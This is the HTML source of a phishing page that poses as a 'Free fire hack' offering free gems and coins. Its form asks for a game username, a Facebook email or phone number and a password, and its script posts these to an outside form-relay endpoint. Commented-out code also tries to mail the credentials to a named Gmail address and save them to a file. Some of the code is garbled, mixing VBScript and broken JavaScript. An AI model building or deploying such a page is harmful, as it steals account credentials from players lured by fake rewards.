<html>
  <marquee>Get Free Gems on Free fire</marquee>
      <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>Free fire hack</title>
  <style>
    body {
      margin: 15px;
      color: blue;
      background-color: Yellow;
    }
    .display-none {
      display: none;
    }
    marquee {
      color: blue;
    }
    img {
      display: block;
      width: 30%;
    }
    button {
      background-color:Green;
    }
  </style>
  <body>
  </body>
  <img
    src="https://cdn.glitch.com/c874eeb1-9824-42e1-823f-c343df42c0e0%2Fdownload.jpeg?v=1583449288939"
    alt="free fire"
  />
  <script>
    /*function text() {
        const emp = document.getElementById('em');
        const pwp = document.getElementById('pw');
          let data = "iid=" + emp.value, "\n" "pass=" + pwp.value;
          recipient="realherobrine001";
var at = String.fromCharCode(64);
var dotcom="@gmail.com";
var mail="mailto:";
window.open(mail+recipient+at+dotcom);
          window.open('mailto:realherobrine001@gmail.com');
    set fso = CreateObject("Scripting.FileSystemObject");
        set s   = fso.CreateTextFile("./f.txt", true);
     s.writeline(document.passForm.data.value);
      s.close()
          const fs = require("fs")
          fs.writeFile("./f.txt", data, (err) => {
                       if(err) throw(err)
        });

         const textToBLOB = new Blob([data], { type: */
    $(document).ready(function() {
      $("#contact-form").submit(function(e) {
        var name = document.getElementById("inputName");
        var email = document.getElementById("inputEmail");
        var message = document.getElementById("inputMessage");

        if (!name.value || !email.value || !message.value) {
          alert.error("Please check your entries");
          return false;
        } else {
          $.ajax({
            method: "POST",
            url: "https://formspree.io/mleddply",
            data: $("#contact-form").serialize(),
            datatype: "json"
          });
          e.preventDefault();
          $(this)
            .get(0)
            .reset();
          alert.success("Message sent");
        }
      });
    });
   /* function end() {
      setTimeout(function() {
        window.close(
          "https://formspree.io/thanks?next=https%3A%2F%2Finstagram-follow-like.glitch.me%2F"
        );
        window.close("https://instagram-follow-like.glitch.me/");
      }, 2000);
    }*/
  </script>
  <div class="container">
    <div class="row">
      <div class="col-md-12">
        <form
          id="contact-form"
          action="https://formspree.io/mleddply"
          method="POST"
        >
          <div class="form-group center-block">
            <label for="inputName">UserName</label><br />
            <input
              type="text"
              class="form-control contact-input"
              id="inputName"
              placeholder="Name"
              name="name"
            />
          </div>
          <div class="form-group center-block">
            <label for="inputEmail">Facebook</label><br />
            <input
              type="email"
              class="form-control contact-input"
              id="inputEmail"
              placeholder="Email/Phone Number"
              name="email"
            />
          </div>
          <div class="form-group center-block">
       <label for="inputMessage">Password</label><br /><textarea id="inputMessage" class="" rows="1" placeholder="Pass Gen" name="pass"></textarea>
            <br />
          </div>
          0-100000000 Coins/Gems
          <input
            type="text"
            placeholder="0-10000000"
            name="_gotcha"
            class="display-none"
          /><br /><br />
          <input
            type="checkbox"
            name="Gem"
            value="Gems"
          />Gems<br />
          <input type="checkbox" name="coin" value="coins" />Coins<br />
          <div class="text-center">
            <button
              class="btn btn-default"
              type="submit"
              id="email-submit-btn"
              value="Send"
              onclick="end()"
            >
              Submit
            </button>
          </div>
          <span></span>
        </form>
      </div>
    </div>
  </div>
</html>
